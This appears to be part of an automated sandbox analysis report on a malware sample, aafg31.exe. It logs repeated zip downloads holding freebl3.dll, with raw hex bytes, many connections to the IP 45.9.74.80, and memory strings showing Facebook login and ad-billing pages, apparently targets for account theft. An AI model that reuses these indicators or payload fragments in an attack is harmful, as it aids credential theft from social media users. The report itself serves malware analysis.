b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:43:48 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:43:52 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:44:00 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:44:05 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmSTo8","isCQuick":false});</script><script nonce="v6hVXULl">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="v6hVXULl"></style><script nonce="v6hVXULl">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.642437211.000001E292240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comPSAlrc equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.642437211.000001E292240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comfz8VF8 equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comn equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $$http://45.9.74.80/0bjdwww.facebook.com/ equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fadsmanager.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing%252F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_EP9wX8qDDvu sx_0de3e6"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Check out Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT0Y9zIysCrbJFCPFMlse-gnu3W6OP_sO2dsjqCIgGPDlGqle6Pq8kOh1pM3LGc_qoBc_JvYGTcC_aI2wUV6kMqf24x_kc0D-YeanjoTUCdBOM9bT_SKJdRe3aUc2iw_VtiKIZYeEOK7pfpnIAJsJHT8p1oD8-P6VzQ" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="async">Instagram</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/discover/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></
                Source: aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fadsmanager.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing%252F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_EP9wX8qDDvu sx_0de3e6"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook 